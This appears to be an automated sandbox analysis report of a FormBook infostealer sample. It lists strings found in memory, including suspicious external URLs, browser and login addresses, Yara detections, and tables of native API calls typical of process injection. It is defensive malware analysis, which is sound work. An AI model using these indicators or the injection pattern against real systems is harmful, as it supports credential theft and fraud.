Source: runonce.exe, 0000000A.00000002.3506005522.0000000007C88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: runonce.exe, 0000000A.00000002.3506005522.0000000007C88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: runonce.exe, 0000000A.00000002.3506005522.0000000007C88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: runonce.exe, 0000000A.00000002.3506005522.0000000007C88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: runonce.exe, 0000000A.00000002.3506005522.0000000007C88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: runonce.exe, 0000000A.00000002.3506005522.0000000007C88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: runonce.exe, 0000000A.00000003.2936782405.0000000002D43000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.3501224102.0000000002D39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: runonce.exe, 0000000A.00000003.2936782405.0000000002D43000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.3501224102.0000000002D39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: runonce.exe, 0000000A.00000003.2935246302.0000000007C7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: runonce.exe, 0000000A.00000003.2936782405.0000000002D43000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.3501224102.0000000002D39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: runonce.exe, 0000000A.00000003.2936782405.0000000002D43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033H
Source: runonce.exe, 0000000A.00000003.2936782405.0000000002D43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: runonce.exe, 0000000A.00000003.2936782405.0000000002D43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033Z
Source: runonce.exe, 0000000A.00000003.2936782405.0000000002D43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srfF
Source: runonce.exe, 0000000A.00000003.2936782405.0000000002D43000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.3501224102.0000000002D39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: runonce.exe, 0000000A.00000002.3501224102.0000000002D39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?clie
Source: runonce.exe, 0000000A.00000003.2936782405.0000000002D43000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.3501224102.0000000002D39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: runonce.exe, 0000000A.00000003.2936782405.0000000002D43000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.3501224102.0000000002D39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: runonce.exe, 0000000A.00000002.3506005522.0000000007C88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 5gtNFDn9VkJys5w.exe, 0000000B.00000002.3503374659.0000000002FF6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.seasay.xyz/c9ts/?KDah=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyaJ
Source: runonce.exe, 0000000A.00000002.3504276702.0000000005664000.00000004.10000000.00040000.00000000.sdmp, 5gtNFDn9VkJys5w.exe, 0000000B.00000002.3503374659.0000000002E64000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.3058490875.000000003D3B4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=86884/vhr7/
Source: runonce.exe, 0000000A.00000002.3504276702.0000000005664000.00000004.10000000.00040000.00000000.sdmp, 5gtNFDn9VkJys5w.exe, 0000000B.00000002.3503374659.0000000002E64000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.3058490875.000000003D3B4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=86884/vhr7/

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 0.2.gH68ux6XtG.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3502216825.0000000000B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3501035690.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3502706773.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2756355640.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2756183235.0000000000C61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3502641258.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3502389846.0000000003370000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2756898776.00000000022F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_00C8CAA3 NtClose,	0_2_00C8CAA3
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512B60 NtClose,LdrInitializeThunk,	0_2_01512B60
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512DF0 NtQuerySystemInformation,LdrInitializeThunk,	0_2_01512DF0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512C70 NtFreeVirtualMemory,LdrInitializeThunk,	0_2_01512C70
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015135C0 NtCreateMutant,LdrInitializeThunk,	0_2_015135C0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01514340 NtSetContextThread,	0_2_01514340
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01514650 NtSuspendThread,	0_2_01514650
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512BF0 NtAllocateVirtualMemory,	0_2_01512BF0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512BE0 NtQueryValueKey,	0_2_01512BE0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512B80 NtQueryInformationFile,	0_2_01512B80
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512BA0 NtEnumerateValueKey,	0_2_01512BA0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512AD0 NtReadFile,	0_2_01512AD0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512AF0 NtWriteFile,	0_2_01512AF0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512AB0 NtWaitForSingleObject,	0_2_01512AB0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512D10 NtMapViewOfSection,	0_2_01512D10
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512D00 NtSetInformationFile,	0_2_01512D00
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512D30 NtUnmapViewOfSection,	0_2_01512D30
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512DD0 NtDelayExecution,	0_2_01512DD0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512DB0 NtEnumerateKey,	0_2_01512DB0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512C60 NtCreateKey,	0_2_01512C60
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512C00 NtQueryInformationProcess,	0_2_01512C00
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512CC0 NtQueryVirtualMemory,	0_2_01512CC0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512CF0 NtOpenProcess,	0_2_01512CF0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512CA0 NtQueryInformationToken,	0_2_01512CA0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512F60 NtCreateProcessEx,	0_2_01512F60
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512F30 NtCreateSection,	0_2_01512F30
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512FE0 NtCreateFile,	0_2_01512FE0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512F90 NtProtectVirtualMemory,	0_2_01512F90
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512FB0 NtResumeThread,	0_2_01512FB0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512FA0 NtQuerySection,	0_2_01512FA0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512E30 NtWriteVirtualMemory,	0_2_01512E30
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512EE0 NtQueueApcThread,	0_2_01512EE0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512E80 NtReadVirtualMemory,	0_2_01512E80
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512EA0 NtAdjustPrivilegesToken,	0_2_01512EA0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01513010 NtOpenDirectoryObject,	0_2_01513010
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01513090 NtSetValueKey,	0_2_01513090
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015139B0 NtGetContextThread,	0_2_015139B0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01513D70 NtOpenThread,	0_2_01513D70
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01513D10 NtOpenProcessToken,	0_2_01513D10
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC4650 NtSuspendThread,LdrInitializeThunk,	10_2_04CC4650
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC4340 NtSetContextThread,LdrInitializeThunk,	10_2_04CC4340
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC2CA0 NtQueryInformationToken,LdrInitializeThunk,	10_2_04CC2CA0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC2C60 NtCreateKey,LdrInitializeThunk,	10_2_04CC2C60
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC2C70 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_04CC2C70
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC2DD0 NtDelayExecution,LdrInitializeThunk,	10_2_04CC2DD0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC2DF0 NtQuerySystemInformation,LdrInitializeThunk,	10_2_04CC2DF0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC2D10 NtMapViewOfSection,LdrInitializeThunk,	10_2_04CC2D10
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC2D30 NtUnmapViewOfSection,LdrInitializeThunk,	10_2_04CC2D30
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC2EE0 NtQueueApcThread,LdrInitializeThunk,	10_2_04CC2EE0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC2E80 NtReadVirtualMemory,LdrInitializeThunk,	10_2_04CC2E80
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC2FE0 NtCreateFile,LdrInitializeThunk,	10_2_04CC2FE0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC2FB0 NtResumeThread,LdrInitializeThunk,	10_2_04CC2FB0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC2F30 NtCreateSection,LdrInitializeThunk,	10_2_04CC2F30
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC2AD0 NtReadFile,LdrInitializeThunk,	10_2_04CC2AD0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC2AF0 NtWriteFile,LdrInitializeThunk,	10_2_04CC2AF0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC2BE0 NtQueryValueKey,LdrInitializeThunk,	10_2_04CC2BE0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	10_2_04CC2BF0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC2BA0 NtEnumerateValueKey,LdrInitializeThunk,	10_2_04CC2BA0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC2B60 NtClose,LdrInitializeThunk,	10_2_04CC2B60
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC35C0 NtCreateMutant,LdrInitializeThunk,	10_2_04CC35C0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC39B0 NtGetContextThread,LdrInitializeThunk,	10_2_04CC39B0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC2CC0 NtQueryVirtualMemory,	10_2_04CC2CC0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC2CF0 NtOpenProcess,	10_2_04CC2CF0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC2C00 NtQueryInformationProcess,	10_2_04CC2C00
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC2DB0 NtEnumerateKey,	10_2_04CC2DB0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC2D00 NtSetInformationFile,	10_2_04CC2D00
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC2EA0 NtAdjustPrivilegesToken,	10_2_04CC2EA0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC2E30 NtWriteVirtualMemory,	10_2_04CC2E30
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC2F90 NtProtectVirtualMemory,	10_2_04CC2F90
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC2FA0 NtQuerySection,	10_2_04CC2FA0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC2F60 NtCreateProcessEx,	10_2_04CC2F60
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC2AB0 NtWaitForSingleObject,	10_2_04CC2AB0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC2B80 NtQueryInformationFile,	10_2_04CC2B80
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC3090 NtSetValueKey,	10_2_04CC3090
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC3010 NtOpenDirectoryObject,	10_2_04CC3010
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC3D70 NtOpenThread,	10_2_04CC3D70
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC3D10 NtOpenProcessToken,	10_2_04CC3D10
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_02CB9680 NtReadFile,	10_2_02CB9680
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_02CB9780 NtDeleteFile,	10_2_02CB9780
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_02CB9510 NtCreateFile,	10_2_02CB9510
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_02CB9820 NtClose,	10_2_02CB9820
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_02CB9980 NtAllocateVirtualMemory,	10_2_02CB9980
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04AAF2CF NtReadVirtualMemory,	10_2_04AAF2CF
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04AAF8C4 NtMapViewOfSection,	10_2_04AAF8C4

Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_00C788F3	0_2_00C788F3
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_00C700CA	0_2_00C700CA
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_00C700D3	0_2_00C700D3
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_00C8F0D3	0_2_00C8F0D3
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_00C63000	0_2_00C63000
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_00C6E2E3	0_2_00C6E2E3
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_00C702F3	0_2_00C702F3
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_00C76AFE	0_2_00C76AFE
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_00C61240	0_2_00C61240
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_00C76B03	0_2_00C76B03
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_00C62462	0_2_00C62462
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_00C62470	0_2_00C62470
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_00C6E47C	0_2_00C6E47C
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_00C6E427	0_2_00C6E427
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_00C6E433	0_2_00C6E433
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_00C62750	0_2_00C62750
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01568158	0_2_01568158
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D0100	0_2_014D0100
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0157A118	0_2_0157A118
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015981CC	0_2_015981CC
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015A01AA	0_2_015A01AA
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015941A2	0_2_015941A2
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01572000	0_2_01572000
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0159A352	0_2_0159A352
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015A03E6	0_2_015A03E6
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014EE3F0	0_2_014EE3F0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01580274	0_2_01580274
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015602C0	0_2_015602C0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E0535	0_2_014E0535
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015A0591	0_2_015A0591
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01592446	0_2_01592446
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01584420	0_2_01584420
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0158E4F6	0_2_0158E4F6
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01504750	0_2_01504750
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E0770	0_2_014E0770
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014DC7C0	0_2_014DC7C0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014FC6E0	0_2_014FC6E0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014F6962	0_2_014F6962
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E29A0	0_2_014E29A0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015AA9A6	0_2_015AA9A6
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E2840	0_2_014E2840
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014EA840	0_2_014EA840
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150E8F0	0_2_0150E8F0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014C68B8	0_2_014C68B8
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0159AB40	0_2_0159AB40
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01596BD7	0_2_01596BD7
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014DEA80	0_2_014DEA80
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0157CD1F	0_2_0157CD1F
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014EAD00	0_2_014EAD00
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014DADE0	0_2_014DADE0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014F8DBF	0_2_014F8DBF
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E0C00	0_2_014E0C00
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D0CF2	0_2_014D0CF2
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01580CB5	0_2_01580CB5
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01554F40	0_2_01554F40
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01500F30	0_2_01500F30
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01582F30	0_2_01582F30
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01522F28	0_2_01522F28
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D2FC8	0_2_014D2FC8
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014ECFE0	0_2_014ECFE0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0155EFA0	0_2_0155EFA0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E0E59	0_2_014E0E59
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0159EE26	0_2_0159EE26
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0159EEDB	0_2_0159EEDB
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0159CE93	0_2_0159CE93
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014F2E90	0_2_014F2E90
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015AB16B	0_2_015AB16B
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0151516C	0_2_0151516C
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014CF172	0_2_014CF172
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014EB1B0	0_2_014EB1B0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E70C0	0_2_014E70C0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0158F0CC	0_2_0158F0CC
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015970E9	0_2_015970E9
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0159F0E0	0_2_0159F0E0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014CD34C	0_2_014CD34C
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0159132D	0_2_0159132D
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0152739A	0_2_0152739A
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014FB2C0	0_2_014FB2C0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015812ED	0_2_015812ED
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E52A0	0_2_014E52A0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01597571	0_2_01597571
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0157D5B0	0_2_0157D5B0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D1460	0_2_014D1460
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0159F43F	0_2_0159F43F
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0159F7B0	0_2_0159F7B0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01525630	0_2_01525630
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015916CC	0_2_015916CC
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E9950	0_2_014E9950
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014FB950	0_2_014FB950
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01575910	0_2_01575910
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0154D800	0_2_0154D800
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E38E0	0_2_014E38E0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0159FB76	0_2_0159FB76
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01555BF0	0_2_01555BF0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0151DBF9	0_2_0151DBF9
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014FFB80	0_2_014FFB80
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0159FA49	0_2_0159FA49
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01597A46	0_2_01597A46
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01553A6C	0_2_01553A6C
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0158DAC6	0_2_0158DAC6
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01525AA0	0_2_01525AA0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0157DAAC	0_2_0157DAAC
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01581AA3	0_2_01581AA3
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01591D5A	0_2_01591D5A
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E3D40	0_2_014E3D40
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01597D73	0_2_01597D73
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014FFDC0	0_2_014FFDC0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01559C32	0_2_01559C32
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0159FCF2	0_2_0159FCF2
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0159FF09	0_2_0159FF09
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E1F92	0_2_014E1F92
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0159FFB1	0_2_0159FFB1
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E9EB0	0_2_014E9EB0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D3E4F6	10_2_04D3E4F6
